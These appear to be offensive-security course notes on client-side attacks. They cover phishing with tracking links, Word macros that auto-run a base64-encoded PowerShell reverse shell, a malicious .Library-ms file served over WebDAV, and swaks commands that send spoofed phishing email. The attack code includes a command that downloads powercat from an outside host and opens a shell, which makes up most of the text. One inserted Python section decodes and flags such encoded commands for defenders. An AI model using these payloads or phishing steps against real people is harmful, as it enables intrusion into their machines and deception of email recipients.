Client-side attacks

Information Gathering

When you encounter any file from the victim (e.g. posted on their site) you can use exiftool to extract metadata from it.

exiftool <FILE>

Client fingerprinting

Canarytokens is a free web service that generates a link with an embedded token that we send to the target.

We could also use an online IP logger like Grabify, or JavaScript fingerprinting libraries such as fingerprint.js.

Web bug / URL token

The User-Agent header can be modified by the client, so it is not always a reliable source of information.

We can phish our victim into clicking the link, which gets us their IP address, OS type and web browser information.

Exploiting Microsoft Office

Save the document with the .doc extension.

Microsoft Office applications like Word and Excel allow users to embed macros, which are a series of commands and instructions grouped together to programmatically accomplish a task. We can leverage macros to gain remote code execution on the machine.

Macros can be written from scratch in Visual Basic for Applications (VBA).

To create a macro in Microsoft Word go to:

View > Macros

Open PowerShell when the user opens the file:

Sub AutoOpen()
  MyMacro
End Sub

Sub Document_Open()
  MyMacro
End Sub

Sub MyMacro()
  CreateObject("Wscript.Shell").Run "powershell"
End Sub

To create a reverse shell, do the following steps:

Prepare the payload that downloads and runs powercat. Do not forget to set up a file server hosting powercat.ps1 and a netcat listener first.

IEX (New-Object System.Net.Webclient).DownloadString("http://<IP>:<PORT>/powercat.ps1");powercat -c <IP> -p <PORT> -e powershell

Encode the payload as UTF-16LE and then base64, which is the format PowerShell's -e (-EncodedCommand) switch expects; a plain echo | base64 produces UTF-8 and will not decode correctly:

echo -n "<PAYLOAD>" | iconv -t UTF-16LE | base64 -w 0

Split the command into chunks with Python, because VBA limits the length of a single string literal:

# Command line to embed in the macro (placeholder for the base64 from the previous step)
command = "powershell.exe -nop -w hidden -e <BASE64_PAYLOAD>"

n = 50  # characters per VBA string chunk

# Emit one "Str = Str + ..." line per chunk to paste into the macro
for i in range(0, len(command), n):
    print("Str = Str + " + '"' + command[i:i + n] + '"')

Final code:

Sub AutoOpen()
  MyMacro
End Sub

Sub Document_Open()
  MyMacro
End Sub

Sub MyMacro()
  Dim Str As String
  <OUTPUT_FROM_PYTHON>

  CreateObject("Wscript.Shell").Run Str
End Sub
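The defender's counterpart to the encoding step above, added here as an example and not part of the original notes: a small Python triage helper that pulls the -e argument out of a logged process command line (e.g. from Sysmon or 4688 events), decodes it as UTF-16LE base64, and flags the download-and-execute markers seen in this page's stager. The regex, marker list and sample command lines are my own assumptions.

```python
"""Decode and flag PowerShell -EncodedCommand payloads found in process command lines."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENC_SWITCH = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Substrings that, inside a decoded command, commonly indicate a download-and-execute stager.
SUSPICIOUS_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "powercat", "Net.WebClient")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if the line has none / is malformed.

    PowerShell expects base64 of the script in UTF-16LE, so a payload that was
    encoded with plain UTF-8 decodes to mojibake (or fails) here, which is itself a tell."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_markers(decoded: str):
    """Return the suspicious markers present in a decoded command (case-insensitive)."""
    lowered = decoded.lower()
    return [mk for mk in SUSPICIOUS_MARKERS if mk.lower() in lowered]


def triage(cmdline: str) -> dict:
    """Summarise one command line: decoded text, matched markers and an overall verdict."""
    decoded = decode_encoded_command(cmdline)
    hits = find_markers(decoded) if decoded else []
    return {"decoded": decoded, "markers": hits, "suspicious": bool(hits)}


def encode_utf16le_b64(script: str) -> str:
    """UTF-16LE + base64 helper, used only to construct the sample log lines below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: one benign encoded command, one shaped like the stager on this page.
SAMPLE_BENIGN = "powershell.exe -e " + encode_utf16le_b64("Get-Date")
SAMPLE_STAGER = "powershell.exe -nop -w hidden -e " + encode_utf16le_b64(
    "IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.1:8080/powercat.ps1')")

if __name__ == "__main__":
    for line in (SAMPLE_BENIGN, SAMPLE_STAGER):
        print(triage(line))
```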

Windows Library Files Code Execution

Kali WebDAV hosting:

If you do not have wsgidav installed, install it with: pip3 install wsgidav

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

Malicious file code:

Save the file with the .Library-ms extension.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <name>@windows.storage.dll,-34582</name>
    <version>6</version>
    <isLibraryPinned>true</isLibraryPinned>
    <iconReference>imageres.dll,-1003</iconReference>
    <templateInfo>
        <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
    </templateInfo>
    <searchConnectorDescriptionList>
        <searchConnectorDescription>
            <isDefaultSaveLocation>true</isDefaultSaveLocation>
            <isSupported>false</isSupported>
            <simpleLocation>
                <url>http://[WEBDAV_IP]</url>
            </simpleLocation>
        </searchConnectorDescription>
    </searchConnectorDescriptionList>
</libraryDescription>

Create a shortcut (.lnk) with the reverse shell command below and upload it to the WebDAV share.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/powercat.ps1'); powercat -c <IP> -p <PORT> -e powershell"

Send the phishing email:

sudo swaks -t <TARGET_USER>@<TARGET_DOMAIN> --from <ATTACKER_EMAIL>@<TARGET_DOMAIN> --attach @config.Library-ms --server <MAIL_SERVER> --body @<txt_file> --header "Subject: <Subject>" --suppress-data -ap

If you get an authentication error using the above command, try this one:

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach config.Library-ms --server 192.168.227.242 --body body.txt --header "Subject: Staging Script" --suppress-data -ap
